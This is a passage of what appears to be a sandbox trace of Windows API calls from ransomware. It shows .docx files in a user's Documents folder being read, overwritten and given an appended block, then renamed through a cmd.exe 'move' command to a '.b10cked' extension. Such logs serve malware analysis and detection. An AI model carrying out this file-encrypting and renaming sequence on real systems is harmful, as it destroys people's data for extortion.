dwThreadId=0xc2c)) returned 1 [0134.948] CloseHandle (hObject=0x110) returned 1 [0134.948] CloseHandle (hObject=0x114) returned 1 [0134.948] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.948] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.948] CompareStringW 
(Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0134.948] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.948] ReleaseMutex (hMutex=0xf8) returned 1 [0134.948] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.948] ReleaseMutex (hMutex=0xf8) returned 1 [0134.948] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.948] ReleaseMutex (hMutex=0xf8) returned 1 [0134.948] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.948] ReleaseMutex (hMutex=0xf8) returned 1 [0134.948] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\8rVd3erYRX.docx" (normalized: "c:\\users\\eebsym5\\documents\\8rvd3eryrx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0134.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.948] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19173773047) returned 1 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.949] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x24a5 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24a5 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1fbd [0134.950] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0134.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0134.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x24a5 [0134.951] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x24a5 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.952] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1251, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1251, lpOverlapped=0x0) returned 1 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.952] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1251, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1251, lpOverlapped=0x0) returned 1 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=-4689, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1254 [0134.952] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1251, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1251, lpOverlapped=0x0) returned 1 [0134.952] SetFilePointer (in: hFile=0x114, lDistanceToMove=-4689, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1254 [0134.952] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1251, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1251, lpOverlapped=0x0) returned 1 [0134.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8rVd3erYRX.docx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="8rVd3erYRX.docx", cchWideChar=15, lpMultiByteStr=0x131326c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8rVd3erYRX.docx", lpUsedDefaultChar=0x0) returned 15 [0134.957] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x24a5 [0134.957] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0134.958] CloseHandle (hObject=0x114) returned 1 [0134.958] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\8rVd3erYRX.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC") returned 0x26 [0134.959] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.959] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, 
dwProcessId=0xc1c, dwThreadId=0xc28)) returned 1 [0134.964] CloseHandle (hObject=0x110) returned 1 [0134.964] CloseHandle (hObject=0x114) returned 1 [0134.964] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.964] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.964] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0134.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.964] ReleaseMutex (hMutex=0xf8) returned 1 [0134.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.964] ReleaseMutex (hMutex=0xf8) returned 1 [0134.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.964] ReleaseMutex (hMutex=0xf8) returned 1 [0134.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.964] ReleaseMutex (hMutex=0xf8) returned 1 [0134.964] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\D2poZdDEdi.docx" (normalized: "c:\\users\\eebsym5\\documents\\d2pozddedi.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.964] 
QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19175359375) returned 1 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13492 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x12faa [0134.966] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13492 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0134.967] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13492 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.967] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9a48, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9a48, lpOverlapped=0x0) returned 1 [0134.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.968] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9a48, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9a48, lpOverlapped=0x0) returned 1 [0134.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39496, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9a4a [0134.968] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9a48, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9a48, lpOverlapped=0x0) returned 1 [0134.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39496, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9a4a [0134.968] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9a48, lpNumberOfBytesWritten=0x12ec1c, 
lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9a48, lpOverlapped=0x0) returned 1 [0134.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D2poZdDEdi.docx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D2poZdDEdi.docx", cchWideChar=15, lpMultiByteStr=0x131322c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D2poZdDEdi.docx", lpUsedDefaultChar=0x0) returned 15 [0134.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13492 [0134.972] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0134.972] CloseHandle (hObject=0x114) returned 1 [0134.973] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\D2poZdDEdi.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC") returned 0x26 [0134.974] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, 